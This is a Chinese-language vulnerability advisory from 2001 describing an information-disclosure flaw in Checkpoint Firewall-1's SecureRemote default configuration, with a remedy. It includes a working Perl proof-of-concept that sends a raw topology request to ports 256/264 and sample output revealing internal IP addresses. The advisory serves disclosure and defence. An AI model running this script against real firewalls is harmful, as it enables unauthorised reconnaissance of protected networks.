Checkpoint Firewall-1 存在信息泄露问题

发布时间：2001-07-19
更新时间：2001-07-19
严重程度：中
威胁程度：服务器信息泄露
错误类型：配置错误
利用方式：服务器模式

受影响系统

Checkpoint Firewall-1

详细描述
Checkpoint Firewall-1 调用SecureRemote来在FW-1模块和用户之间
建立加密的会话进程，在远程用户与内部主机通信前，保护的网络
拓扑会下载到客户端。不过新的FW-1软件版本可以限制只有认证过的
会话进程才能下载这个拓扑信息，不过默认的设置存在问题允许未
认证的请求被接受，造成攻击者可以获得包括IP地址，网络地址掩码，
甚至一些友好信息等。

测试代码
下面的PERL脚本可以连接防火墙，下载拓扑结构(如果SecuRemote在运行)：

SensePost# perl sr.pl firewall.example.com
Testing on port 256
        :val (
                :reply (
                        : (-SensePost-dotcom-.hal9000-19.3.167.186
                                :type (gateway)
                                :is_fwz (true)
                                :is_isakmp (true)
                                :certificates ()
                                :uencapport (2746)
                                :fwver (4.1)
                                :ipaddr (19.3.167.186)
                                :ipmask (255.255.255.255)
                                :resolve_multiple_interfaces ()
                                :ifaddrs (
                                        : (16.3.167.186)
                                        : (12.20.240.1)
                                        : (16.3.170.1)
                                        : (29.203.37.97)
                                )
                                :firewall (installed)
                                :location (external)
                                :keyloc (remote)
                                :userc_crypt_ver (1)
                                :keymanager (
                                        :type (refobj)
                                        :refname ("#_-SensePost-dotcom-")

) :name
                                (-SensePost-dotcom-Neo16.3.167.189)
                                                :type (gateway)
                                                :ipaddr (172.29.0.1)
                                                :ipmask (255.255.255.255)
                                        )

--snip--

#!/usr/bin/perl
# A Command-line tool that can be used to download network Topology
# from Firewall-1's running SecureRemote, with the option "Allow un
# authenticated cleartext topology downloads".
# Usage sr.pl IP
# Haroon Meer & Roelof Temmingh 2001/07/17
# haroon@sensepost.com - http://www.sensepost.com

use Socket;
if ($#ARGV<0) {die "Usage: sr.pl IP\n";}

$port=256;
$target=inet_aton($ARGV[0]);
print "Testing $host on port $port\n";

$SENDY= "410000000259052100000004c41e43520000004e28746f706f6c6f67792d726571756573740a093a63616e616d6520282d53656e7365506f73742d646f74636f6d2d290a093a6368616c6c656e67652028633265323331383339643066290a290a00";
$SENDY = pack("H*",$SENDY);

@results=sendraw($SENDY);

if ($#results == 0) {
print "No results on port 256 - trying 264\n";
$port=264;
@results2=sendraw($SENDY);
if ($#results2 == 0) {die "Sorry - no results\n";}
} else {print @results;}

sub sendraw {
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,$port,$target)){
  my @in;
  select(S); $|=1; print $pstr;
  while(<S>){ push @in, $_;}
  select(STDOUT); close(S); return @in;
} else { return ""; }
}
# Spidermark: sensepostdata fw1

解决方案
打开Policy PRoperties Desktop Security，并把
respond to unauthenticated topology requests"选项不选定。

相关信息
haroon at sensepost.com

最近严重漏洞

Checkpoint Firewall-1 存在信息泄露问题